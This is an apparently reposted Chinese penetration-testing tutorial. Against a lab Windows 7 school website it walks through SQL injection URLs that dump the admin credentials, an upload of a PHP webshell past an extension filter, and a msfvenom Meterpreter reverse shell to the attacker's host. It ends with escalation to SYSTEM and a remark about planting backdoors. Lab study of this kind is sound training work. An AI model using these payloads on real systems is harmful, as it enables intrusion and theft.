您当前的位置:首页 > 电脑百科 > 安全防护 > 黑客技术

模拟网站渗透测试最终实现提权的全部过程

时间:2023-02-18 14:40:05  来源:今日头条  作者:老李讲安全

前言

很多安全人新入门时,都需要在特定的靶场进行学习,今天老李给大家找了一篇关于网站拿webshell的全部过程。当然了,文章中所有的操作都是基于靶场进行了,小伙伴可以找相关的测试用例,但是千万不对真实的网站进行攻击。

准备工作

靶机(被攻击方):win7系统

入侵者(攻击方):win10系统、kali系统

首先启动win7系统,搭建一个常见的校园网站,然后映射到局域网,使得我们能正常访问。


 

从网站拿到webshellsql注入漏洞

把整个网站浏览完一遍后,我们发现这里的url为?id=10结尾,我们猜测可能是一个sql注入点。


 

首先我们在id=10后面加上一个单引号’进行判断。


 

这个时候我们发现回显的数据不正常,于是我们再加一个注释符号。


 

发现数据这个时候回显的时候是正常的,到这一步我们已经可以确定这里存在一个sql注入漏洞。

 

原理我们可以简单解释一下 在网站中,我们一般使用数据库存储网站数据,网站和数据库是存在一个交互性。网站所呈现的内容是由代码中写入的sql语句调用数据库中的内容进行一个呈现,例如我们刚刚看到的文字。 而sql注入漏洞一般是由于程序员书写的sql语句不规范所导致的安全事件。

 

例如网站源码中使用如下的sql语句进行查询。


 

给语句结尾的where查询条件加上一个单引号’。


 

很显然,我们传入的单引号和前面的单引号闭合,后面只有一个无法成对的单引号,然后报了语法错误。

这个时候我们再加上--+注释符号注释掉后面的单引号。


 

这个时候查询的数据就会正确回显出来。

原理简单解释了一下之后,我们回到刚刚的网站。

这个时候我们发现存在sql注入漏洞之后,我们就开始进行查询对方网站数据库的数据,找到一些敏感信息,例如管理员的账号密码等等。

首先,我们使用order by语句快速猜解出表中的列数。


 

发现10列的时候报错,说明不足10列,我们继续缩小范围。


 

再查询第8列的时候,发现数据回显正确,说明对方表中含有列数8
我们使用union select 自定义查询测试一下,zhu意我们这里前面的id=10,要写成id=-10,把这里的查询置空。


 

发现会分别回显第三列、第五列和第七列。接下来我们就可以在三、五、七处做做文章。

查询数据库名字:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,database(),4,5,6,7,8--+


 

得到数据库名字:qzn_zuiAI

查询数据库中的表名:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema="qzn_zuiai"--+


 

得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表
通过表名,我们猜测se2admin可能是存储管理员账号和密码的表,所以我们先查询这张表中的数据

查询表se2admin中的字段:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name="se2admin"--+


 

得到表中的字段值有id,name,pass等,接下来我们查询name和pass的字段值。

查询字段值:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,name,4,pass,6,7,8 from se2admin--+


 

我们得到管理员账号:admin,管理员账号密码:

7fef6171469e80d32c0559f88b377245
很显然密码值是被加密的md5值,所以我们去网上找md5网站进行撞库查询。


 

得到管理员密码为:admin888

接下来我们需要查找这个网站的后台地址,我们使用御剑进行一个扫描。


 

御剑爆出了很多敏感地址,我们找到一个admin的目录,可能是后台地址,我们去访问一下。


 

输入我们刚刚得到的管理员账号和密码admin:admin888。


 

这个时候,我们成功进入对方网站后台。

文件上传漏洞

接下来我们再这里找到一个文件上传点。


 

我们写一个简单的一句话木马。


 

考虑到这里可能会对我们上传的文件进行一个后缀限制,例如只能上传jpg或者png图片格式文件等,所以我们把muma.txt改成muma.jpg格式。


 

我们开启burpsuite,然后点提交,拦截到我们发送的数据包。


 

我们把muma.jpg改回php文件类型:muma.php。


 

然后发送数据包。


 

ok,已经上传成功,我们去找找我们上传后的路径。


 

得到我们的上传完整路径为:http://192.168.1.167/yxlink/img/img_3699336993.php
我们使用蚁剑进行连接我们上传的木马。


 

成功连接,进入到对方服务器。


 

到此,已成功拿到webshell。

反弹shell连接

接下来我们利用kali的msf制作一个exe类型的反弹型木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名


 

把做好的木马,通过我们蚁剑刚刚连接的webshell进行上传。


 


 

上传成功后,我们在kali启动msf。


 

执行监听

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.131 set lport 4444 exploit


 

执行木马

msf开启监听之后,我们去蚁剑webshell执行我们上传的木马。


 

执行之后,回到kali,我们可以看到msf目标正在回连,创建Meterpreter会话成功。


 

提权

首先查看一下我们的用户权限。

发现是普通用户权限,之前我们已经在webshell观察到对方是win7系统,所以我们采用的是windows的载荷攻击

我们尝试使用getsystem进行提权试试。


 

发现直接提权成功,现在我们拥有windows最高权限system。

接下来我们打印一下系统信息,并且拍照对方电脑现在状态。


 


 

ok,成功。

结语

在拿到system权限之后,我们可以干很多很多的事…例如给对方种下后门,拿来当肉鸡等等… …

这告诉我们开发网站必须注重安全,否则带来的后果是无穷大的。

 

作者:dotast 原文地址:https://www.freebuf.com/articles/web/290214.html

 

再次声明:本头条号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本头条号及原作者不承担相应的后果.



Tags:渗透测试最   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
模拟网站渗透测试最终实现提权的全部过程
前言很多安全人新入门时,都需要在特定的靶场进行学习,今天老李给大家找了一篇关于网站拿webshell的全部过程。当然了,文章中所有的操作都是基于靶场进行了,小伙伴可以找相关的测...【详细内容】
2023-02-18  Search: 渗透测试最  点击:(208)  评论:(0)  加入收藏
分享10个渗透测试最佳工具的使用方法及下载链接
渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到...【详细内容】
2020-08-31  Search: 渗透测试最  点击:(576)  评论:(0)  加入收藏
▌简易百科推荐
小心“黑客”利用445端口攻击你的Win8系统!
Windows 8系统自带一个名为SMB(Server Message Block)的服务,使用445端口进行通信。这个服务主要用于文件共享和网络协议等功能,但是无良黑客也会利用这个服务来攻击你的电脑。...【详细内容】
2024-04-10    潘小姐  Tags:445端口   点击:(2)  评论:(0)  加入收藏
为什么黑客不去攻击微信钱包?
在这个数字化时代,网络安全已经成为我们生活中不可或缺的一部分。每当我们打开手机,使用微信钱包进行支付时,是否曾有过这样的疑问:为什么黑客不去攻击微信钱包?这个问题,就像是在...【详细内容】
2024-02-19  猫探长情报局  今日头条  Tags:黑客   点击:(55)  评论:(0)  加入收藏
发条消息就能破解iPhone?苹果系统这次像被“内鬼”攻破的。。。
前几天,差评君在网上冲浪的时候,看到了一条相当震撼的消息:简单来讲,就是主打封闭安全的 iPhone ,不仅被攻击者发现了漏洞成功入侵,完全控制整个手机。更加抽象的是入侵的还是知名...【详细内容】
2024-01-26  差评    Tags:破解iPhone   点击:(134)  评论:(0)  加入收藏
十种黑客攻击手段及防御方法
在互联网的世界里,网站安全犹如一座城堡,需要严密的防线来抵御各种攻击手段。以下是10种最常见的网络攻击手段,以及我们如何采取措施来保护我们的网站。1. 跨站脚本攻击:这是黑...【详细内容】
2024-01-21  老吴讲IT    Tags:黑客攻击   点击:(83)  评论:(0)  加入收藏
渗透测试中最常见的漏洞有哪些?
什么是渗透测试?渗透测试是一项安全测试,旨在模拟黑客的攻击方式,评估系统、网络或应用程序的安全性,发现潜在的安全漏洞并提出建议来修复它们。渗透测试中最常见的漏洞包括:1....【详细内容】
2024-01-11  五湖联技术服务公司    Tags:渗透测试   点击:(105)  评论:(0)  加入收藏
作为一名黑客/安全专家,应该掌握什么技能?熟悉哪些软件/工具?
作为一名合格的黑客/网络安全专家,应该具备一套全面的知识体系和实战技能,同时熟悉多种安全软件和工具。今天我们将根据目前市面上流行的一些应用程序,以及常规的安全防护措施,...【详细内容】
2023-12-11  黑客联盟I    Tags:黑客   点击:(140)  评论:(0)  加入收藏
黑客是如何入侵一个网站的?(网络安全人员应该了解的知识)
前不久阿里以及滴滴系统的大规模瘫痪足以唤起人们对网络安全的重视。我首先必须澄清的是,作为一个网络安全专家,我不提供或者鼓励任何违法的行为,包括未经授权的计算机系统入侵...【详细内容】
2023-12-07  黑客联盟I    Tags:黑客   点击:(176)  评论:(0)  加入收藏
网络黑客入侵解析:保护你的网络安全
在当今数字化快速发展的时代,网络安全问题逐渐成为人们关注的焦点。网络黑客入侵事件频发,给个人和企业带来了严重的威胁。本文将深入解析网络黑客入侵的常见手段和原因,并探讨...【详细内容】
2023-12-05  小记青春    Tags:黑客入侵   点击:(161)  评论:(0)  加入收藏
黑客滥用 Google 表单进行诈骗
研究人员最近发现滥用 Google 表单的垃圾邮件有所增加,攻击者首先在 Google 表单中创建新的问卷调查,并且利用受害者的电子邮件地址参与问卷调查,滥用 Google 表单的功能将垃圾...【详细内容】
2023-11-23  区块软件开发  今日头条  Tags:黑客   点击:(220)  评论:(0)  加入收藏
黑客工具 Flipper Zero 曝光,可利用蓝牙弹出窗口崩溃 iPhone
据外媒 9to5Mac 报道,一种流行且廉价的黑客设备 Flipper Zero 今年 9 月首次出现,可通过制造蓝牙弹出窗口,向 iPhone 和 iPad 重复告诉发送垃圾内容,直到相关设备最终崩溃,不过直...【详细内容】
2023-11-20  IT之家    Tags:黑客工具   点击:(242)  评论:(0)  加入收藏
站内最新
站内热门
站内头条